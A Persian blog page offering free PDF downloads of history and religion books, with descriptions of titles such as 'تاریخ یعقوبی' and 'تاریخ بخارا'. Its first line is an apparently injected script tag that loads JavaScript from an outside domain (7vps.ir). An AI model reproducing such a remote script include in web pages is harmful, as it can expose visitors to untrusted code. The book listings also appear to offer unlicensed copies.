script type="text/javascript" src="http://7vps.ir/img/website.js"> دانلود کتاب تاریخی
کافی نت
وبلاگی جذاب

دانلود کتاب صد جنگ بزرگ تاریخ

نوشته شده توسط محمد علی پور در تاریخ پنجشنبه، 16 تیر ماه 1390
 



نام کتاب: صد جنگ بزرگ تاریخ
نویسنده: علی غفوری
تعداد صفحات: 200
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
كسانى كه سابقه‏ ى مبارزه در میادین جنگى را دارند، به خوبى به خاطر مى‏آورند در میدان نبرد، مرگ انسان‏ها بسیار ساده اتفاق مى‏افتد و سربازان خیلى زود به مرگ هم‏قطاران، دوستان و حتی برادران خود عادت مى‏كنند اما همین افراد به محض تغییر شرایط و پایان جنگ پى مى‏برند كه در جنگ چه بر آن‏ها گذشته و چه بر سر دشمنان خود آورده‏اند. اما از یك نكته هیچ وقت نمى‏توان فرار كرد: جنگ اجتناب‏ناپذیر است. شاید ضرورى نباشد اما اگر زمان رخ دادن آن برسد، هیچ كس نمى‏تواند مانع آغاز آن شود. نظامیان نقطه آغاز جنگ را سیاستمداران مى‏دانند و سیاستمداران برعكس آنان، جنگ را در نتیجه علامت‏هاى غلط نظامیان ذكر مى‏كنند اما امروز عامل دیگرى نیز به این دو عامل اضافه شده است. افكار عمومى، گاهى افكار عمومى جنگ را مى‏طلبد. در کتاب آماده شده به صد جنگ بسیار بزرگ و تاریخی و گسترده و اثرات آن پرداخته شده است.
برای دانلود رایگان کتاب "صد جنگ بزرگ تاریخ" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

دانلود کتاب زن مظلوم همیشه ی تاریخ

نوشته شده توسط محمد علی پور در تاریخ چهارشنبه، 8 تیر ماه 1390
 



نام کتاب: زن مظلوم همیشه ی تاریخ
نویسنده: آیت الله محمدرضا نکونام
تعداد جلد ها: 4
تعداد صفحات: 1215
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
کتاب پیش رو کتابی است کامل و جامع در مورد زنان و حق و حقوق آنها و همچنین مظلوم زنان و علل آن در طول تاریخ و  از نظر اسلام  که در هزار صفحه تهیه شده است. نویسنده کتاب بر این باور است که در گستره ی طولانی زمان، کتاب های فراوانی با نگرش های گوناگون درباره ی زن، این عطیه ی الهی و مظلوم همیشه ی تاریخ نوشته شده است، ولی آثار و نوشته های موجود، کم و بیش، خالی از کاستی و اشکال نیستک ؛ چرا گه فرصت لازم یا شناخت جامعی از زن برای نویسندگان این آثار پدید نیامده است. حتی گاه برخی چهره های علمی - مذهبی به علت اهمال و ساده انگاری، پیچیدگی مباحث زن و یا سلیقه های فردی و مسلکی، مشکلاتی به بار آورده و پیامی مخالف با مقتضای عقل و مبانی دین ارایه کرده اند. با این وصف فرجام کار نویسندگان با دانش و فرهنگ اصیل دینی ناگفته پیداست! از این رو سعی بر آن رفت تا در زمانی که موضوع زن یکی از مباحث اساسی و حیاتی جوامع گوناگون، بویژه جامعه ماست، برای شناخت صحیح و جامع چهره ی زن و دفع شباهت و ابهامات از ساخت شخصیت زن و دین مقدس اسلام، از میان صدها اثر ارزنده ی استاد فرزانه، حضرت آیت الله نکونام کتاب حاضر که برترین کتاب در این زمینه است برایتان آماده شده است.
برای دانلود رایگان کتاب "زن مظلوم همیشه ی تاریخ" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

دانلود کتاب تاریخ یعقوبی

نوشته شده توسط محمد علی پور در تاریخ سه شنبه، 31 خرداد ماه 1390
 



نام کتاب: تاریخ یعقوبی
نویسنده: ابن واضح یعقوبی
تعداد صفحات: 1245
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
تاریخ یعقوبی از قدیمترین تاریخ‌های عمومی به زبان عربی، نوشته احمدبن ابی یعقوب بن جعفربن وَهْب بن واضح یعقوبی است. این کتاب خلاصه‌ای است از تاریخ جهان از آغاز تا میانه‌های سده ۳ق است که نکات آشکاری در مورد سازمان اداری و تشکیلاتی حکومت‌های سده ۲ و سده ۳ق روشن می‌کند. منشیگری و کاتب بودن یعقوبی به او کمک کرد تا اطلاعات گرانبهایی را در کتاب خود بگنجاند. ویژگی آشکار تاریخ یعقوبی یاد سرگذشت امامان شیعه است . او به مناسبت ذکر وفات ائمه، خلاصه‌ای از سرگذشت و سخنان آنان را تا امام علی النقی آورده است. کتاب تاریخ یعقوبی در دو جلد بصورت کامل و در 1245 صفحه و بی نقص با فرمت پی دی اف آماده شده است.
برای دانلود رایگان کتاب "تاریخ یعقوبی" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download


دانلود کتاب تاریخ ماد، هخامنشی، پارت، سلوکی، ساسانی

نوشته شده توسط محمد علی پور در تاریخ دوشنبه، 30 خرداد ماه 1390
 



نام کتاب: تاریخ ماد، هخامنشی، پارت، سلوکی، ساسانی
نویسنده: امیرحسین خنجی
تعداد صفحات:1030 
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
سرزمینی که در تاریخ جهان نام ایران زمین به خود گرفت از زمانهای بسیار دوری مسکن جماعات متعدد و قبایل ب ی شماری از قوم بزرگ آریا بود که در سراسر این زمین پهناور پراکنده بودند . این سرزمین از تاجیکستانِ کنونی شروع م یشد، زمینهای میانِ دو رودِ بزرگ آمودریا و سیردریا (که اکنون در ازبکستان و ترکمنستان واقع اند ) را دربر می گرفت، ١ بخش اعظمِ سرزمینِ ا فغانستانِ کنونی را شامل می شد، بلوچستانِ بزرگ (که اکنون بخش اعظمِ آندر پاکستان است ) را شامل می شد، ایرانِ کنونی را در می نوردید، در شمال شامل سرزمینهای دوسوی شرقی و غربیِ دریای مازندران می شد و به کوههای قفقاز می رسید و همینطور گسترده تر می شد. در کتاب آمده شده بصورت کامل و جامع و در حدود هزار صفحه به بررسی تاریخ کامل کشور ایران من جمله تاریخ اقوام ماد، هخامنشیان، پارت، سلوکی و ساسانی پرداخته شده است. کتاب پیش رو شامل سی و یک فصل و با فرمت پی دی اف آماده شده تقدیم به علاقه مندان تاریخ ایران می شود.
برای دانلود رایگان کتاب "تاریخ ماد، هخامنشی، پارت، سلوکی، ساسانی" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download
 

دانلود کتاب زندگانی امام حسین (ع)

نوشته شده توسط محمد علی پور در تاریخ شنبه، 21 خرداد ماه 1390
 



نام کتاب: زندگانی امام حسین (ع)
نویسنده: زین العابدین رهنما
تعداد صفحات: 815
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
زین‌العابدین رهنما (۱۲۷۲ در نجف - 12 تیر ۱۳۶۸ در تهران) نویسنده، مترجم، روزنامه‌نگار و پژوهشگر اهل ایران بود. او در دهه ۱۳۲۰ مدیرمسئول روزنامه ایران، رئیس انجمن قلم ایران و از برجسته‌ترین روزنامه‌نگاران ایران بود. رهنما چندین دوره نماینده مجلس شورای ملی، وزیرمختار ایران در فرانسه و سفیر ایران در کشورهای عربی نیز بوده‌است. او به جز زبان فارسی، به زبان‌های عربی و فرانسوی نیز تسلط داشت. او بیشتر به خاطر دو کتابش به نام‌های پیامبر و حسین، مشهور است. زین العابدین رهنما نویسنده کتاب داستانی « زندگانی امام حسین ( ع ) سعی کرده است به شیوه جرجی زیدان ( مولف و مورخ مسیحی لبنانی ) ، با استفاده از داستانی عشقی ، بازگویی و نیز مطالعه تاریخ را جذاب و شیرین نماید که بهمین منظور داستان ارینب را خمیر مایه این کتاب قرار داده است

برای دانلود رایگان کتاب "زندگانی امام حسین (ع)" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

دانلود کتاب بیستون نبشته های آریایی

نوشته شده توسط محمد علی پور در تاریخ جمعه، 26 فروردین ماه 1390
 



نام کتاب: بیستون، نبشته های آریایی
نویسنده: آرمین کسروی
تعداد صفحات: 19
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
در کتاب آماده شده مطالب زیادی در مورد کتیبه بیستون و نوشته های حک شده بر روی آن توضیح داده شده است. در این کتاب که در نوشته های آن از منابع معتبر کمک گرفته شده است از نقش برجسته روی کتیبه بیستون گرفته تا خط میخی و سازندگان آن مورد بحث و بررسی قرار گرفته است و کتابی جالب برای علاقه مندان به تاریخ می باشد.
عناوین کتاب:
-بیستون
- نقش برجسته بیستون
- جزئیات نقش برجسته و کتیبه بیستون
- متن کتیبه داریوش بزرگ شاهنشاه هخامنشی در بیستون
- از گمانه زنی ها تا کشف واقعیت های بیستون
- خط میخی چیست؟
- خط میخی پارسی باستان
- سازنده خط میخی پارسی باستان کیست؟
- و ...
برای دانلود رایگان کتاب "بیستون، نبشته های آریایی" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

دانلود کتاب تاریخ بخارا

نوشته شده توسط محمد علی پور در تاریخ پنجشنبه، 25 فروردین ماه 1390
 



نام کتاب: تاریخ بخارا
نویسنده: ابوبکر محمد بن جعفر نرشخی
ترجمه: ابونصر احمدبن محمد نصر القباوی
تعداد صفحات: 116
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
تاریخ بخارا (نام دیگر: مزارات بخارا) مهمترین و قدیمترین تاریخ محلی بر جای مانده درباره بخارا به زبان فارسی است. این کتاب را ابوبکر محمدبن جعفر نرشخی به عربی به نام نوح‌بن نصر سامانی نوشته و در در ابتدای سده ۶ق ابو نصر احمدبن محمد نصر القباوی به خواهش برخی از دوستانش به پارسی ترجمه کرد. در تاریخ ۵۷۴ق محمدبن زفربن عمر ترجمه قباوی را تلخیص کرد و آن را به نام برهان‌الدین عبدالعزیزبن عمربن عبدالعزیزبن مازه از صدور آل مازه بخارا درآورد. به سبب ترجمه و تلخیص و اضافاتی که در متن اصلی تاریخ بخارا راه یافته، اختلاف‌هایی از لحاظ تاریخ و محتوای حوادث در روایات مکرر کتاب دیده می‌شود. تاریخ بخارا از حیث محتوا بر اطلاعات منحصر به فرد از اوضاع پایتخت و تاریخ سامانیان، اهمیت ویژه دارد. این اثر همچین شامل اطلاعات گران‌بهایی است که از نظر زبان‌شناسی، سکه‌شناسی، باستان‌شناسی و تاریخی مورد استفاده محققان جدید قرار گرفته است.
برای دانلود رایگان کتاب "تاریخ بخارا" از میهن دانلود به ادامه مطلب مراجعه نمایید
 
ادامه مطلب+Download

دانلود کتاب جامع اطلس تاریخ ایران

نوشته شده توسط محمد علی پور در تاریخ پنجشنبه، 25 فروردین ماه 1390
 



نام کتاب: اطلس تاریخ ایران
جمع آوری: نامشخص
تعداد صفحات: 238
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
اینبار با کتابی تاریخی و بی نظیر در خدمتتان هستیم. در کتاب آماده شده شما می توانید کلیات تاریخ ایران را قبل از میلاد مسیح و بعد از میلاد مسیح مطالعه نمایید. از کتاب از دوران پارینه سنگی قدیم 1000000 شروع و پهلوی ادامه دارد. در این کتاب ارزشمند نام تمامی سلسله ها، چگونگی به قدرت رسیدن، نام پادشاهان، دلایل سقوط و ... جمع آوری شده است و اکثر موضوعات تاریخی ایران را شامل می شود.
برای دانلود رایگان کتاب "اطلس تاریخ ایران" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

دانلود کتاب مبارزه به روش بروسلی

نوشته شده توسط سعید در تاریخ دوشنبه، 22 فروردین ماه 1390

http://mihandownload.com/mypic/Bruce%20LEE.jpg

کتاب فوق العاده و با ارزش مبارزه به روش بروسلی برای اولین در میهن دانلود
دانلود از سرورهای قدرتمند میهن دانلود


یکی دیگر از کتاب های قوی را در میهن دانلود شاهد خواهیم بود...
کتاب فوق العاده مبارزه به روش بروسلی.!
بروس لی شکل نمادین در هنر های رزمی میباشد که پیشگام مفهوم jeet kune بود...
بروس لی (زاده ۲۷ نوامبر ۱۹۴۰ (میلادی) - درگذشته ۲۰ ژوئیه ۱۹۷۳ (میلادی))، استاد هنرهای رزمی، بازیگر فیلم‌های رزمی، فیلسوف و بنیانگذار سبک جیت کان دو (Jeet Kune Do) است. او به عنوان تاثیر گذارترین رزمی کار قرن بیستم و نماد فرهنگی (cultural icon) شناخته شده‌است. او همچنین پدر دو بازیگر به نام‌های براندون لی (Brandon Lee) و شانون لی (Shannon Lee) بود.
لی در سانفرانسیسکو در کالیفرنیا به دنیا آمد و تا اواخر نوجوانی در هنگ کنگ بزرگ شد. فیلم‌های تولید هالیوود که او در هنگ کنگ بازی کرد موجب ارتقای سطح فیلم‌های رزمی هنگ کنگ شده بود و تحسین عامه را برانگیخت و موجی از علاقه مندی به فیلم‌های هنرهای رزمی چینی را در جهان غرب به وجود آورد. کارگردانی و جو فیلم‌های او، هنرهای رزمی و فیلم هنرهای رزمی را در هنگ کنگ و بقیه جهان تغییر داد.
لی به یک چهره نمادین تبدیل شد به خصوص برای چینی‌ها، زیرا در فیلم‌هایش به عنوان افتخار ملی برای چین و ملی‌گرایی چینی ظاهر شد. او در ابتدای امر به یادگیری هنرهای رزمی چینی (کونگ فو) مخصوصا وینگ چون پرداخت.
بروس لی در ۲۷ نوامبر سال ۱۹۴۰ ساعت اژدها بین ساعت ۷ تا ۹ صبح در سال اژدها (Year of the Dragon) طبق تقویم طالع‌بینی چینی در یک بیمارستان چینی در چیناتون سانفرانسیسکو (San Francisco's Chinatown) به دنیا آمد. پدرش لی هو چون (Lee Hoi-Chuen) (李海泉) چینی بود . مادر کاتولیکش گریس هو (Grace Ho) یک چینی آلمانی تبار بود. وقتی بروس لی سه ماه داشت والدینش به هنگ کنگ برگشتند.[پیوند مرده] در مورد تابعیت او اختلاف وجود دارد شاید آمریکایی بود شاید چینی بود و شاید هم بریتیش سابجکت (British subject) بود (زیرا اهالی هنگ کنگ در زمان او بریتیش سابجکت بودند)

برای دانلود به ادامه مطلب مراجعه نمایید...
 

دانلود کتاب تاریخ ادیان و مذاهب جهان

نوشته شده توسط محمد علی پور در تاریخ شنبه، 6 فروردین ماه 1390
 



نام کتاب: تاریخ ادیان و مذاهب جهان
نویسنده: عبدالله مبلغی آبادانی
تعداد صفحات: 738
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
از آغاز خلقت تا کنون، همه انسان‌ها هر کدام روش و مسلک خاصی را انتخاب كرده، دستور مذهبی ویژه‌ای را اتخاذ کرده و کیش و آیین خود را به فرزندان خود از نسلی به نسل دیگر انتقال داده اند و بعدها تاریخ‌ نگاران هر یک از این شیوه‌ها و مسلک‌ها را به نام دین و مذهب فرقه خاصی ثبت کرده‌اند. دانشمندان اسلامی نیز از قرن سوم هجری تا کنون درباره تاریخ ادیان و مذاهب آثار ارزنده‌ای از خود به جا گذاشته‌اند. نویسنده در جلد نخست این کتاب ابتدا ضمن پیشگفتاری کوتاه به تعریف تاریخ، علم تاریخ و تاریخ و تمدن می‌پردازد و در ادامه در دو بخش جداگانه به تعریف دین و مذهب و نسبت آن با انسان می‌پردازد. سپس به موضوع اصلی کتاب یعنی بررسی ادیـــان و مذاهب مصر باستان، روم باستان، یونان باستان، و نیز ادیان و مذاهب باستانی ژاپن، چین، هند و ایران باستان می‌پردازد. در جلد دوم تاریخ ادیان مانی، مزدک، یهود، دین عیسی، دین صابئین و دین حنیف حضرت ابراهیم ارائه شده است و جلد سوم به دین اسلام، فرقه‌ها، مکتب‌ها، و نهضت‌های فکری جهان اسلام اختصاص دارد.
برای دانلود رایگان کتاب "تاریخ ادیان و مذاهب جهان" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

صفحات سایت

 1  |  2 



دو شنبه 20 تير 1390برچسب:مقدمه ای بر جنگ های تاریخی,کتاب الکترونیک,کتاب صد جنگ بزرگ تاریخ,برترین جنگ ها,بزرگترین جنگ های تاریخ,تحلیل جنگ های تاریخی,تشریح جنگ های تاریخی,جنگ های ایران,جنگ های بی نظیر تاریخی,جنگ های باستانی,جنگ های تاریخ,جنگ های تاریخی,جنگ های جهان,جنگ بزرگ,جنگ جهانی,دانلود کتاب 100 جنگ تاریخی,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود کتاب صد جنگ بزرگ تاریخ,دانلود رمان جدید,دانلود رایگان کتاب 100 جنگ بزرگ تاریخی دانلود کتاب,دانلود رایگان کتاب صد جنگ بزرگ تاریخ,شرح جنگ های قدیمی,صد جنگ بزرگ تاریخ,صد جنگ بزرگ تاریخی,مورد ظلم قرار گرفتن زنان,همیشه مظلوم در تاریخ زن,کتاب الکترونیک,کتاب زن مظلوم همیشه ی تاریخ,کتاب زن مظلوم همیشه ی تاریخ نکونام,کتاب زن مظلوم همیشه تاریخ نوشته آیت الله نکونام,کتاب زن مظلوم همیشه تاریخ اثر آیت الله نکونام,ایت الله نکونام کتاب زن مظلوم همیشه ی تاریخ,تاریخ مظلومیت زن,تاریخ ظلم ورزیدن بر زنان,دانلود کتاب,دانلود کتاب های آیت الله نکونام,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود کتاب زن مظلوم همیشه ی تاریخ,دانلود رمان جدید,دانلود رایگان کتاب زن مظلوم همیشه ی تاریخ,زن مظلوم همیشه ی تاریخ,زن مظلوم همیشگی تاریخ,زن مظلوم تاریخ,زن و مظلومیت,زنان و ظلم و اذیت,فایل پی دی اف تاریخ یعقوبی,نسخه سالم کتاب تاریخ یعقوبی,واقعیت های تاریخ یعقوبی,کتاب الکترونیک,کتاب تاریخ یعقوبی,کتاب تاریخ یعقوبی با فرمت PDF,تاریخ یعقوب,تاریخ یعقوبی,تاریخ یعقوبی pdf,تاریخ یعقوبی کامل,تاریخ یعقوبی با فرمت پی دی اف,تاریخ یعقوبی جلد اول,تاریخ یعقوبی جلد دوم,دانلود هر دو جلد کتاب تاریخ یعقوبی,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب اسکن شده تاریخ یعقوبی,دانلود کتاب تاریخ یعقوبی,دانلود کتاب تاریخ یعقوبی بصورت پی دی اف,دانلود کتاب جدید,دانلود تاریخ یعقوبی,دانلود تاریخ یعقوبی بصورت ورد,دانلود رمان جدید,دانلود رایگان کتاب تاریخ یعقوبی,ماد در ایران,کتاب الکترونیک,اقوام ایرانی,تاریخ ماد و هخامنشی و پارت و سلوکی و ساسانی,تاریخ مادها و پارت ها,تاریخ مادهای ایران,تاریخ هخامنشی,تاریخ هخامنشیان,تاریخ کامل ایران,تاریخ کامل سلطنت های ایران,تاریخ پارت,تاریخ پارت ها در ایران,تاریخ ایران,تاریخ ایران در زمان ماد ها,تاریخ ایران در زمان هخامنشیان,تاریخ ایران در زمان پارت ها,تاریخ ایران در زمان سلوکیان,تاریخ ایران در زمان ساسانیان,تاریخ جنگ های ایران,تاریخ سلوکی,تاریخ سلوکی و ساسانی,تاریخ ساسانی,جنگ های ماد, هخامنشی, پارت, سلوکی و ساسانی,جنگ های هخامنشی,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب تاریخ ماد, هخامنشی, پارت, سلوکی, ساسانی,دانلود کتاب جامع تاریخ سلطنت های ایرانی,دانلود کتاب جدید,دانلود رمان جدید,دانلود رایگان کتاب پرمحتوای تاریخ ماد, هخامنشی, پارت, سلوکی, ساسانی,کتاب الکترونیک,کتاب امام حسین (ع) اثر زین العابدین رهنما,کتاب امام حسین (ع) اثری از امام حسین (ع),کتاب زندگینامه امام حسین (ع),کتاب زندگانی امام حسین (ع) نوشته ی زین العابدین رهنما,از ابتدا تا انتهای زندگی امام حسین (ع),دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود رمان جدید,دانلود رایگان کتاب امام حسین (ع) زین العابدین رهنما,دانلود رایگان کتاب زندگی نامه امام حسین (ع),دانلود رایگان کتاب زندگانی امام حسین (ع),دانلود رایگان زندگینامه امام حسین (ع),دانلود شجره نامه ی امام حسین,زندگی نامه کامل امام حسین,زندگی امام حسین,زندگی دردناک امام حسین,زندگینامه امام حسین,زندگانی امام حسین (ع),زین العابدین رهنما کتاب امام حسین (ع),شجره نامه امام حسین,نقش برجسته بیستون,نوشته های حک شده روی بیستون,نبشته های بیستون,کتیبه بیستون,کتیبه باشکوه بیستون,کتاب الکترونیک,کتاب بیستون,بیستون,تحقیق درمورد کتیبه بیستون,جزئیات نقش برجسته بیستون,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب بیستون, نبشته های آریایی,دانلود کتاب جدید,دانلود رمان جدید,دانلود رایگان کتاب بیستون,کتاب قدیمی تاریخ بخارا,کتاب الکترونیک,کتاب بی نظیر تاریخ بخارا,کتاب تاریخ بخارا,کتاب تاریخ بخارا بدون تحریف,ابوبکر نرشخی تاریخ بخارا,تاریخ بخارا نرشخی,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب تاریخ بخارا,دانلود کتاب جدید,دانلود تاریخ بخارا,دانلود رمان جدید,دانلود رایگان تاریخ بخارا,مروری بر تاریخ ایران,کتاب الکترونیک,کتاب اطلس تاریخ ایران,کتاب جامع اطلس تاریخ ایران,کتب تاریخی,اطلس کلی تاریخ ایران,اطلس ایران,اطلس تاریخ ایران,تاریخ کلی ایران,تاریخ ایران,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب تاریخ ایران,دانلود کتاب جدید,دانلود رمان جدید,دانلود رایگان کتاب اطلس تاریخ ایران,کتاب الکترونیک,کتاب تاریخ,کتاب تاریخ ایران و جهان,کتابهای تاریخی,تاریخ,تاریخ مذهب ها,تاریخ کامل ایران,تاریخ ایران,تاریخ ادیان,تاریخ ادیان و گذشتگان,تاریخ جهان,تاریخ دین ها,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب تاریخ ادیان و مذاهب جهان,دانلود کتاب جدید,دانلود کتب تاریخی,دانلود رمان جدید,, :: 7:42 بعد از ظهر
گری گوری

دانلود کتاب زندگانی امام حسین (ع)

نوشته شده توسط محمد علی پور در تاریخ شنبه، 21 خرداد ماه 1390
 



نام کتاب: زندگانی امام حسین (ع)
نویسنده: زین العابدین رهنما
تعداد صفحات: 815
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
زین‌العابدین رهنما (۱۲۷۲ در نجف - 12 تیر ۱۳۶۸ در تهران) نویسنده، مترجم، روزنامه‌نگار و پژوهشگر اهل ایران بود. او در دهه ۱۳۲۰ مدیرمسئول روزنامه ایران، رئیس انجمن قلم ایران و از برجسته‌ترین روزنامه‌نگاران ایران بود. رهنما چندین دوره نماینده مجلس شورای ملی، وزیرمختار ایران در فرانسه و سفیر ایران در کشورهای عربی نیز بوده‌است. او به جز زبان فارسی، به زبان‌های عربی و فرانسوی نیز تسلط داشت. او بیشتر به خاطر دو کتابش به نام‌های پیامبر و حسین، مشهور است. زین العابدین رهنما نویسنده کتاب داستانی « زندگانی امام حسین ( ع ) سعی کرده است به شیوه جرجی زیدان ( مولف و مورخ مسیحی لبنانی ) ، با استفاده از داستانی عشقی ، بازگویی و نیز مطالعه تاریخ را جذاب و شیرین نماید که بهمین منظور داستان ارینب را خمیر مایه این کتاب قرار داده است

برای دانلود رایگان کتاب "زندگانی امام حسین (ع)" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 



ادامه مطلب ...


صفحه قبل 1 صفحه بعد

درباره وبلاگ


به وبلاگ خودتان خوش آمدید امیدوارم که در این وبلاگ بتوانم نیاز شما دوست گرامی را برآورده سازم.
آخرین مطالب
آرشيو وبلاگ
نويسندگان
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان کافی نت و آدرس caffinet.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.








نام :
وب :
پیام :
2+2=:
(Refresh)

<-PollName->

<-PollItems->

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 9
بازدید دیروز : 0
بازدید هفته : 101
بازدید ماه : 9133
بازدید کل : 139284
تعداد مطالب : 562
تعداد نظرات : 8
تعداد آنلاین : 1


Alternative content


آریان پیامک
آریان اس ام اس